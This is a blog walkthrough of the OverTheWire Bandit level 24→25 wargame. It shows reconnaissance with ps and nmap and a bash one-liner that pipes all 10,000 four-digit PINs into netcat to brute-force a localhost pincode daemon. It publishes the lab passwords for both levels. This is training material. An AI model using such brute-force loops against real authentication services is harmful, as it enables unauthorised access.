Skip to main content

Bandit Level 24 → 25

Shubham
Cybersecurity Enthusiast

Login: ssh bandit24@bandit.labs.overthewire.org -p 2220
Password: gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8

task

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

theory lil bit

  1. Process Enumeration: Using ps aux | grep helps identify background services or processes running under specific user accounts.
  2. Port Scanning: nmap is used to verify if a specific port on localhost is actually open and listening.
  3. Manual Interaction: Before writing a script, it's crucial to connect to the service manually (using nc) to understand exactly what input format the program expects and what output it gives.
  4. Brute-Forcing with Loops: A bash for loop combined with brace expansion {0000..9999} is the fastest way to generate all possible 4-digit PINs. Piping (|) this massive output directly into nc automates the attack.

my approach / solution

1. Reconnaissance: First, I wanted to see if there were any obvious processes running for bandit25.

bandit24@bandit:~$ ps aux | grep bandit25

I also poked around /var/run to see if there were any interesting socket or PID files, but didn't find anything immediately useful for this challenge.

2. Verifying the Port: I knew from the prompt that a service was on port 30002. After a quick typo with an nmap flag, I scanned the port locally to confirm it was up and listening as pago-services2.

bandit24@bandit:~$ nmap localhost -p 30002
Starting Nmap 7.94SVN ...
PORT STATE SERVICE
30002/tcp open pago-services2

3. Manual Testing: Before writing any scripts, I connected manually to see what the daemon actually wanted. First, I just piped the password, but it failed. Then, I connected interactively and typed a few random guesses (0 0 0 0, 0 0 0 1) to see how it handled bad inputs.

bandit24@bandit:~$ nc localhost 30002 I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space. 0 0 0 0 Wrong! Please enter the correct current password and pincode. Try again.

4. The Brute-Force Attack: Once I understood the format (<password> <pin>), I wrote a one-liner bash for loop to generate all numbers from 0000 to 9999. I echoed the password alongside the generated PIN and piped the entire 10,000-line stream directly into the netcat connection.

bandit24@bandit:~$ for i in {0000..9999}; do echo "gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8 $i"; done | nc localhost 30002

5. Catching the Flag: The script fired off thousands of attempts in seconds. The terminal flooded with "Wrong!" messages until it finally hit the correct PIN, breaking the loop with the success message:

Wrong! Please enter the correct current password and pincode. Try again. Correct! The password of user bandit25 is iCi86ttT4KSNe1armKiwbQNmB3YJP3q4

<!-- truncate -->